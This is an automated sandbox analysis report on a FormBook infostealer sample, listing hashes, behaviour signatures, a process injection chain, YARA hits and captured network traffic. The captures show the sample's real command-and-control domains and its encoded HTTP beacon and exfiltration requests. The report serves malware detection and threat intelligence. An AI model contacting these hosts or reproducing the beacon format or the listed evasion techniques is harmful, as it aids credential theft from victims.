Windows Analysis Report
arGdXDmyGJ.exe

Overview

General Information

Sample name: arGdXDmyGJ.exe (renamed because the original name is a hash value)
Original sample name: 32139448518440440a55f5651ce646f6b4bee27828754bf37d879b65bf4db573.exe
Analysis ID: 1634891
MD5: 0813d6baff3338225b54a33627b15466
SHA1: 5fd7af6257a820fa7141eb2743f35e92f23541a3
SHA256: 32139448518440440a55f5651ce646f6b4bee27828754bf37d879b65bf4db573
Tags: exe, Formbook, user-adrian__luca

Detection

FormBook
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Yara detected FormBook
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Joe Sandbox ML detected suspicious sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for reading data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • arGdXDmyGJ.exe (PID: 6764 cmdline: "C:\Users\user\Desktop\arGdXDmyGJ.exe" MD5: 0813D6BAFF3338225B54A33627B15466)
    • svchost.exe (PID: 6908 cmdline: "C:\Users\user\Desktop\arGdXDmyGJ.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • DKwZ8oxmXrzaXEMk9aGP.exe (PID: 5424 cmdline: "C:\Program Files (x86)\wweVsWBcJqmWrzgijugAWZclUfWRUiyaAXqfTIQseHNQxCvydTPwh\NErByGQbKw.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
        • takeown.exe (PID: 7200 cmdline: "C:\Windows\SysWOW64\takeown.exe" MD5: A9AB2877AE82A53F5A387B045BF326A4)
          • DKwZ8oxmXrzaXEMk9aGP.exe (PID: 5156 cmdline: "C:\Program Files (x86)\wweVsWBcJqmWrzgijugAWZclUfWRUiyaAXqfTIQseHNQxCvydTPwh\FkNMtjPgZf.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
          • firefox.exe (PID: 7396 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Yara matches in memory dumps (Source, Rule, Description, Author, Strings):
Source: 0000000A.00000002.3703535087.00000000032B0000.00000004.00000800.00020000.00000000.sdmp, Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Author: Joe Security
Source: 00000002.00000002.1423385230.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Author: Joe Security
Source: 0000000A.00000002.3701920023.0000000002F00000.00000040.80000000.00040000.00000000.sdmp, Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Author: Joe Security
Source: 0000000C.00000002.3703579679.0000000000E00000.00000040.80000000.00040000.00000000.sdmp, Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Author: Joe Security
Source: 00000002.00000002.1424207705.0000000004C00000.00000040.10000000.00040000.00000000.sdmp, Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Author: Joe Security
Yara matches in unpacked PE files (Source, Rule, Description, Author, Strings):
Source: 2.2.svchost.exe.400000.0.unpack, Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Author: Joe Security
Source: 2.2.svchost.exe.400000.0.raw.unpack, Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Author: Joe Security

System Summary

Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: "C:\Users\user\Desktop\arGdXDmyGJ.exe", CommandLine: "C:\Users\user\Desktop\arGdXDmyGJ.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\arGdXDmyGJ.exe", ParentImage: C:\Users\user\Desktop\arGdXDmyGJ.exe, ParentProcessId: 6764, ParentProcessName: arGdXDmyGJ.exe, ProcessCommandLine: "C:\Users\user\Desktop\arGdXDmyGJ.exe", ProcessId: 6908, ProcessName: svchost.exe
Source: Process started, Author: vburov, Data: Command: "C:\Users\user\Desktop\arGdXDmyGJ.exe", CommandLine: "C:\Users\user\Desktop\arGdXDmyGJ.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\arGdXDmyGJ.exe", ParentImage: C:\Users\user\Desktop\arGdXDmyGJ.exe, ParentProcessId: 6764, ParentProcessName: arGdXDmyGJ.exe, ProcessCommandLine: "C:\Users\user\Desktop\arGdXDmyGJ.exe", ProcessId: 6908, ProcessName: svchost.exe
No Suricata rule has matched

AV Detection

Source: arGdXDmyGJ.exe, Avira: detected
Source: http://www.nan21.net/qgyh/, Avira URL Cloud: Label: malware
Source: http://www.multo.xyz/7pb3/, Avira URL Cloud: Label: malware
Source: http://www.multo.xyz/7pb3/?KXtX=iG3q5PwMXeyF6Z6OHOwnLDAB2x86IZiFZMnOHUGgWgCa6YvXG8DQKYCG1+TzSzVVi72rS31ZgGUBbEqi37d3liyshf+awvumd8QMl+tW3OgygeOmbI1Z2eSrbRuDAHzm0lVjKsQ=&bH_=FhMhihd8ULglqpU, Avira URL Cloud: Label: malware
Source: http://www.nan21.net/qgyh/?KXtX=N2HmuFTIqRTXb4KETJj8CE9599F//QagMURGDfaeIcB+VU8vulHmTvOSs8UDoR9HksVnHqxRO+DaBCTDBDB84DrGlrLbfAup4LskVHxAz2aVoJcIctBHkC743fNM4m+H2KSbQJE=&bH_=FhMhihd8ULglqpU, Avira URL Cloud: Label: malware
Source: arGdXDmyGJ.exe, Virustotal: Detection: 74%
Source: arGdXDmyGJ.exe, ReversingLabs: Detection: 68%
Source: Yara match, File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0000000A.00000002.3703535087.00000000032B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000002.00000002.1423385230.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 0000000A.00000002.3701920023.0000000002F00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 0000000C.00000002.3703579679.0000000000E00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000002.00000002.1424207705.0000000004C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 0000000A.00000002.3703646071.0000000003410000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000002.00000002.1423688801.0000000003010000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000009.00000002.3703690536.0000000004420000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
Source: arGdXDmyGJ.exe, Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: Binary string: takeown.pdbGCTL source: svchost.exe, 00000002.00000003.1392680906.0000000002A26000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1391395201.0000000002A1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1392668149.0000000002A1A000.00000004.00000020.00020000.00000000.sdmp, DKwZ8oxmXrzaXEMk9aGP.exe, 00000009.00000002.3703008425.000000000135E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: arGdXDmyGJ.exe, 00000000.00000003.1232120246.0000000004200000.00000004.00001000.00020000.00000000.sdmp, arGdXDmyGJ.exe, 00000000.00000003.1233120508.0000000004060000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1423720111.0000000003100000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1423720111.000000000329E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1330139854.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1328248098.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, takeown.exe, 0000000A.00000003.1423717679.000000000331F000.00000004.00000020.00020000.00000000.sdmp, takeown.exe, 0000000A.00000002.3703920004.0000000003680000.00000040.00001000.00020000.00000000.sdmp, takeown.exe, 0000000A.00000002.3703920004.000000000381E000.00000040.00001000.00020000.00000000.sdmp, takeown.exe, 0000000A.00000003.1426108573.00000000034CB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: takeown.pdb source: svchost.exe, 00000002.00000003.1392680906.0000000002A26000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1391395201.0000000002A1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1392668149.0000000002A1A000.00000004.00000020.00020000.00000000.sdmp, DKwZ8oxmXrzaXEMk9aGP.exe, 00000009.00000002.3703008425.000000000135E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: arGdXDmyGJ.exe, 00000000.00000003.1232120246.0000000004200000.00000004.00001000.00020000.00000000.sdmp, arGdXDmyGJ.exe, 00000000.00000003.1233120508.0000000004060000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.1423720111.0000000003100000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1423720111.000000000329E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1330139854.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1328248098.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, takeown.exe, takeown.exe, 0000000A.00000003.1423717679.000000000331F000.00000004.00000020.00020000.00000000.sdmp, takeown.exe, 0000000A.00000002.3703920004.0000000003680000.00000040.00001000.00020000.00000000.sdmp, takeown.exe, 0000000A.00000002.3703920004.000000000381E000.00000040.00001000.00020000.00000000.sdmp, takeown.exe, 0000000A.00000003.1426108573.00000000034CB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: svchost.pdb source: takeown.exe, 0000000A.00000002.3702052200.0000000002F9E000.00000004.00000020.00020000.00000000.sdmp, takeown.exe, 0000000A.00000002.3704350785.0000000003CAC000.00000004.10000000.00040000.00000000.sdmp, DKwZ8oxmXrzaXEMk9aGP.exe, 0000000C.00000002.3704031711.000000000264C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000D.00000002.1736983581.0000000037F3C000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: svchost.pdbUGP source: takeown.exe, 0000000A.00000002.3702052200.0000000002F9E000.00000004.00000020.00020000.00000000.sdmp, takeown.exe, 0000000A.00000002.3704350785.0000000003CAC000.00000004.10000000.00040000.00000000.sdmp, DKwZ8oxmXrzaXEMk9aGP.exe, 0000000C.00000002.3704031711.000000000264C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000D.00000002.1736983581.0000000037F3C000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: DKwZ8oxmXrzaXEMk9aGP.exe, 00000009.00000002.3702330015.0000000000F3F000.00000002.00000001.01000000.00000005.sdmp, DKwZ8oxmXrzaXEMk9aGP.exe, 0000000C.00000000.1492047890.0000000000F3F000.00000002.00000001.01000000.00000005.sdmp
Source: C:\Users\user\Desktop\arGdXDmyGJ.exe, Code function: 0_2_00FF445A GetFileAttributesW,FindFirstFileW,FindClose, 0_2_00FF445A
Source: C:\Users\user\Desktop\arGdXDmyGJ.exe, Code function: 0_2_00FFC6D1 FindFirstFileW,FindClose, 0_2_00FFC6D1
Source: C:\Users\user\Desktop\arGdXDmyGJ.exe, Code function: 0_2_00FFC75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 0_2_00FFC75C
Source: C:\Users\user\Desktop\arGdXDmyGJ.exe, Code function: 0_2_00FFEF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00FFEF95
Source: C:\Users\user\Desktop\arGdXDmyGJ.exe, Code function: 0_2_00FFF0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00FFF0F2
Source: C:\Users\user\Desktop\arGdXDmyGJ.exe, Code function: 0_2_00FFF3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 0_2_00FFF3F3
Source: C:\Users\user\Desktop\arGdXDmyGJ.exe, Code function: 0_2_00FF37EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_00FF37EF
Source: C:\Users\user\Desktop\arGdXDmyGJ.exe, Code function: 0_2_00FF3B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_00FF3B12
Source: C:\Users\user\Desktop\arGdXDmyGJ.exe, Code function: 0_2_00FFBCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 0_2_00FFBCBC
Source: C:\Windows\SysWOW64\takeown.exe, Code function: 10_2_02F1C380 FindFirstFileW,FindNextFileW,FindClose, 10_2_02F1C380
Source: C:\Windows\SysWOW64\takeown.exe, Code function: 4x nop then xor eax, eax, 10_2_02F09DD0
Source: C:\Windows\SysWOW64\takeown.exe, Code function: 4x nop then mov ebx, 00000004h, 10_2_035104F8

Networking

Source: DNS query: www.sislieskort.xyz
Source: DNS query: www.dolfisstillspinnin.xyz
Source: DNS query: www.multo.xyz
Source: Joe Sandbox View, IP Address: 3.125.36.175 3.125.36.175
Source: Joe Sandbox View, IP Address: 3.125.36.175 3.125.36.175
Source: Joe Sandbox View, IP Address: 13.248.169.48 13.248.169.48
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\arGdXDmyGJ.exe, Code function: 0_2_010022EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile, 0_2_010022EE
Source: global traffic, HTTP traffic detected: GET /glm7/?KXtX=c3cNohkT5nIdW2eyEx8s7+0O2NNiR/tgpQEW4SezL5ftNCrKyIMnC5N2KYOJPpUbAjTm2X+3v3M3VE72mVE/plipaGNkddb2jL7OOh+v7t/x7/AnjOGKvUlOuL//r1u6EjU+kfE=&bH_=FhMhihd8ULglqpU HTTP/1.1, Host: www.sislieskort.xyz, Accept: */*, Accept-Language: en-US, Connection: close, User-Agent: Mozilla/5.0 (Linux; Android 4.1.2; GT-S5310 Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.111 Mobile Safari/537.36
Source: global traffic, HTTP traffic detected: GET /qgyh/?KXtX=N2HmuFTIqRTXb4KETJj8CE9599F//QagMURGDfaeIcB+VU8vulHmTvOSs8UDoR9HksVnHqxRO+DaBCTDBDB84DrGlrLbfAup4LskVHxAz2aVoJcIctBHkC743fNM4m+H2KSbQJE=&bH_=FhMhihd8ULglqpU HTTP/1.1, Host: www.nan21.net, Accept: */*, Accept-Language: en-US, Connection: close, User-Agent: Mozilla/5.0 (Linux; Android 4.1.2; GT-S5310 Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.111 Mobile Safari/537.36
Source: global traffic, HTTP traffic detected: GET /a669/?KXtX=rwARXV5iz9NY7lD2nse3mpYvX8mI8lq4kwoE5vm7VO31wBaqesAJuHozl9YZ6Ede+IkifZaE/LHkIUXetab9rl00CglX2pKv9YN8iuRxzTdWq+TltZu1Ts2jDMPEAv0cwfEHjzs=&bH_=FhMhihd8ULglqpU HTTP/1.1, Host: www.rbopisalive.cyou, Accept: */*, Accept-Language: en-US, Connection: close, User-Agent: Mozilla/5.0 (Linux; Android 4.1.2; GT-S5310 Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.111 Mobile Safari/537.36
Source: global traffic, HTTP traffic detected: GET /z4h6/?KXtX=oPD5yFZP7wctr4H+UTXo8U1sQMLypPPPi/lke/3f4LEIiJw/NGa43dXYK61sC1fT5ul8W7mIEEjnBlsOqjdznuc7OkkqT82yW4fryMVKvxAGocvAG+dLnJThS/BrQn1Mm9ja8Ac=&bH_=FhMhihd8ULglqpU HTTP/1.1, Host: www.dolfisstillspinnin.xyz, Accept: */*, Accept-Language: en-US, Connection: close, User-Agent: Mozilla/5.0 (Linux; Android 4.1.2; GT-S5310 Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.111 Mobile Safari/537.36
Source: global traffic, HTTP traffic detected: GET /7pb3/?KXtX=iG3q5PwMXeyF6Z6OHOwnLDAB2x86IZiFZMnOHUGgWgCa6YvXG8DQKYCG1+TzSzVVi72rS31ZgGUBbEqi37d3liyshf+awvumd8QMl+tW3OgygeOmbI1Z2eSrbRuDAHzm0lVjKsQ=&bH_=FhMhihd8ULglqpU HTTP/1.1, Host: www.multo.xyz, Accept: */*, Accept-Language: en-US, Connection: close, User-Agent: Mozilla/5.0 (Linux; Android 4.1.2; GT-S5310 Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.111 Mobile Safari/537.36
Source: global traffic, HTTP traffic detected: GET /6sso/?KXtX=5FYyPsJYL9mEwCZYVUnKPFrY8+hnQKVbJI6dHZrolSWgUyhhuZcUC37k5jyocUOOYHYjhpJnfRuNQT4n0jS+7Ytkj8ml9DFWF/GwfVm9hYeou/wyAin0yEy/IsOshtUp3mHulok=&bH_=FhMhihd8ULglqpU HTTP/1.1, Host: www.zenilow.site, Accept: */*, Accept-Language: en-US, Connection: close, User-Agent: Mozilla/5.0 (Linux; Android 4.1.2; GT-S5310 Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.111 Mobile Safari/537.36
Source: global traffic, DNS traffic detected: DNS query: www.sislieskort.xyz
Source: global traffic, DNS traffic detected: DNS query: www.nan21.net
Source: global traffic, DNS traffic detected: DNS query: www.rbopisalive.cyou
Source: global traffic, DNS traffic detected: DNS query: www.dolfisstillspinnin.xyz
Source: global traffic, DNS traffic detected: DNS query: www.multo.xyz
Source: global traffic, DNS traffic detected: DNS query: www.zenilow.site
Source: global traffic, DNS traffic detected: DNS query: www.kakeksakti43.cfd
Source: unknown, HTTP traffic detected: POST /qgyh/ HTTP/1.1, Host: www.nan21.net, Accept: */*, Accept-Language: en-US, Accept-Encoding: gzip, deflate, br, Origin: http://www.nan21.net, Cache-Control: max-age=0, Content-Length: 209, Content-Type: application/x-www-form-urlencoded, Connection: close, Referer: http://www.nan21.net/qgyh/, User-Agent: Mozilla/5.0 (Linux; Android 4.1.2; GT-S5310 Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.111 Mobile Safari/537.36, Data Ascii: KXtX=A0vGtw/WkW7OXty8cb/GaVQjjc5ToiCIJwczDNLlIbNKfAILhkL0CveThtZqoCVetO9OTZYIfaKxVT/SThdIuGD3rd7IBTfPwboRBXMP/XK1q6pQZYMrmy3l49t822mEuZCWaJwejYCE+cYFRMrYKhRRx9GzjPYcDd8aX6UgaF9qJZMsFCaymqkJBt8O/Gi7qQcFapQttYC2
Source: global traffic, HTTP traffic detected: HTTP/1.1 404 Not Found, Cache-Control: private, max-age=0, Content-Type: text/plain; charset=utf-8, Date: Tue, 11 Mar 2025 05:26:29 GMT, Server: Netlify, X-Nf-Request-Id: 01JP1TPC2KSMXE7KTKTBSD4FWE, Content-Length: 50, Connection: close, Data Ascii: Not Found - Request ID: 01JP1TPC2KSMXE7KTKTBSD4FWE
Source: global traffic, HTTP traffic detected: HTTP/1.1 404 Not Found, Cache-Control: private, max-age=0, Content-Type: text/plain; charset=utf-8, Date: Tue, 11 Mar 2025 05:26:31 GMT, Server: Netlify, X-Nf-Request-Id: 01JP1TPEJNVH1538N2RMFXBXSK, Content-Length: 50, Connection: close, Data Ascii: Not Found - Request ID: 01JP1TPEJNVH1538N2RMFXBXSK
Source: global traffic, HTTP traffic detected: HTTP/1.1 404 Not Found, Cache-Control: private, max-age=0, Content-Type: text/plain; charset=utf-8, Date: Tue, 11 Mar 2025 05:26:34 GMT, Server: Netlify, X-Nf-Request-Id: 01JP1TPH30J49YN8QAH0V0GA6T, Content-Length: 50, Connection: close, Data Ascii: Not Found - Request ID: 01JP1TPH30J49YN8QAH0V0GA6T
Source: global traffic, HTTP traffic detected: HTTP/1.1 404 Not Found, Cache-Control: private, max-age=0, Content-Type: text/plain; charset=utf-8, Date: Tue, 11 Mar 2025 05:26:37 GMT, Server: Netlify, X-Nf-Request-Id: 01JP1TPKPTCD502WP8B10MT45E, Content-Length: 50, Connection: close, Data Ascii: Not Found - Request ID: 01JP1TPKPTCD502WP8B10MT45E
Source: global traffic, HTTP traffic detected: HTTP/1.1 404 Not Found, Date: Tue, 11 Mar 2025 05:26:55 GMT, Server: Apache, Content-Length: 493, Connection: close, Content-Type: text/html, Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
Source: global traffic, HTTP traffic detected: HTTP/1.1 404 Not Found, Date: Tue, 11 Mar 2025 05:26:58 GMT, Server: Apache, Content-Length: 493, Connection: close, Content-Type: text/html, Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
Source: global traffic, HTTP traffic detected: HTTP/1.1 404 Not Found, Date: Tue, 11 Mar 2025 05:27:01 GMT, Server: Apache, Content-Length: 493, Connection: close, Content-Type: text/html, Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
Source: global traffic, HTTP traffic detected: HTTP/1.1 404 Not Found, Date: Tue, 11 Mar 2025 05:27:03 GMT, Server: Apache, Content-Length: 493, Connection: close, Content-Type: text/html; charset=utf-8, Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Tue, 11 Mar 2025 05:27:09 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 
